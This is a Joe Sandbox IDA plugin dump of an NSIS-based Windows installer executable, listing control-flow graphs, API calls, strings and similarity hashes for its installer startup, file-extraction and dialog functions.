                                                                                        control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 
403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
APIs
• #17.COMCTL32 ref: 004038A2
• SetErrorMode.KERNELBASE(00008001), ref: 004038AD
• OleInitialize.OLE32(00000000), ref: 004038B4
  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
• SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
• GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
• GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
• CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
• GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
• GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
• lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
• DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
• OleUninitialize.OLE32(?), ref: 00403AD1
• ExitProcess.KERNEL32 ref: 00403AF1
• lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
• lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
• CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
• SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
• DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
• CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
• CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
• GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
• String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
• API String ID: 2435955865-239407132
• Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
• Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
• Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
• Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Control-flow Graph
                                                                                        control_flow_graph 646 4074bb-4074c0 647 4074c2-4074ef 646->647 648 40752f-407547 646->648 650 4074f1-4074f4 647->650 651 4074f6-4074fa 647->651 649 407aeb-407aff 648->649 655 407b01-407b17 649->655 656 407b19-407b2c 649->656 652 407506-407509 650->652 653 407502 651->653 654 4074fc-407500 651->654 657 407527-40752a 652->657 658 40750b-407514 652->658 653->652 654->652 659 407b33-407b3a 655->659 656->659 662 4076f6-407713 657->662 663 407516 658->663 664 407519-407525 658->664 660 407b61-407c68 659->660 661 407b3c-407b40 659->661 677 407350 660->677 678 407cec 660->678 666 407b46-407b5e 661->666 667 407ccd-407cd4 661->667 669 407715-407729 662->669 670 40772b-40773e 662->670 663->664 665 407589-4075b6 664->665 673 4075d2-4075ec 665->673 674 4075b8-4075d0 665->674 666->660 671 407cdd-407cea 667->671 675 407741-40774b 669->675 670->675 676 407cef-407cf6 671->676 679 4075f0-4075fa 673->679 674->679 680 40774d 675->680 681 4076ee-4076f4 675->681 682 407357-40735b 677->682 683 40749b-4074b6 677->683 684 40746d-407471 677->684 685 4073ff-407403 677->685 678->676 688 407600 679->688 689 407571-407577 679->689 690 407845-4078a1 680->690 691 4076c9-4076cd 680->691 681->662 687 407692-40769c 681->687 682->671 692 407361-40736e 682->692 683->649 697 407c76-407c7d 684->697 698 407477-40748b 684->698 703 407409-407420 685->703 704 407c6d-407c74 685->704 693 4076a2-4076c4 687->693 694 407c9a-407ca1 687->694 706 407556-40756e 688->706 707 407c7f-407c86 688->707 695 40762a-407630 689->695 696 40757d-407583 689->696 690->649 699 407c91-407c98 691->699 700 4076d3-4076eb 691->700 692->678 708 407374-4073ba 692->708 693->690 694->671 709 40768e 695->709 710 407632-40764f 695->710 696->665 696->709 697->671 705 40748e-407496 698->705 699->671 700->681 711 407423-407427 703->711 704->671 705->684 715 407498 705->715 706->689 707->671 713 4073e2-4073e4 708->713 714 4073bc-4073c0 708->714 709->687 716 
407651-407665 710->716 717 407667-40767a 710->717 711->685 712 407429-40742f 711->712 719 407431-407438 712->719 720 407459-40746b 712->720 723 4073f5-4073fd 713->723 724 4073e6-4073f3 713->724 721 4073c2-4073c5 GlobalFree 714->721 722 4073cb-4073d9 GlobalAlloc 714->722 715->683 718 40767d-407687 716->718 717->718 718->695 725 407689 718->725 726 407443-407453 GlobalAlloc 719->726 727 40743a-40743d GlobalFree 719->727 720->705 721->722 722->678 728 4073df 722->728 723->711 724->723 724->724 730 407c88-407c8f 725->730 731 40760f-407627 725->731 726->678 726->720 727->726 728->713 730->671 731->695
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
• Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
• Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
• Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
• LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
• GetProcAddress.KERNEL32(00000000), ref: 00406327
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0
• Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
• Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
• Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
• Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
APIs
• FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
• FindClose.KERNEL32(00000000), ref: 004062EC
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
• Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
• Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
• Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Control-flow Graph
                                                                                        control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 
404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                                                                        APIs
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                        Strings
                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                        • Jump: %d, xrefs: 00401602
                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                        • BringToFront, xrefs: 004016BD
                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                        • Call: %d, xrefs: 0040165A
                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                        • API String ID: 2872004960-3619442763
                                                                                        • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                        • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                         Control-flow Graph
                                                                                         [rendered graph for the function at 0040592C not reproduced; its blocks call lstrcatW, lstrlenW, lstrcmpiW, GetFileAttributesW, LoadImageW, RegisterClassW, SystemParametersInfoW, CreateWindowExW, ShowWindow, LoadLibraryW, GetClassInfoW and DialogBoxParamW; executed versus not-executed blocks are shown only in the interactive report]
                                                                                        APIs
                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                        • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                        • API String ID: 608394941-1650083594
                                                                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,MountainDecision,MountainDecision,00000000,00000000,MountainDecision,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$MountainDecision
                                                                                        • API String ID: 4286501637-5759938
                                                                                        • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                        • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                                         Control-flow Graph
                                                                                         [rendered graph for the function at 00403587 not reproduced; its blocks call GetTickCount, GetModuleFileNameW, GetFileSize, GlobalAlloc and SetFilePointer; executed versus not-executed blocks are shown only in the interactive report]
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
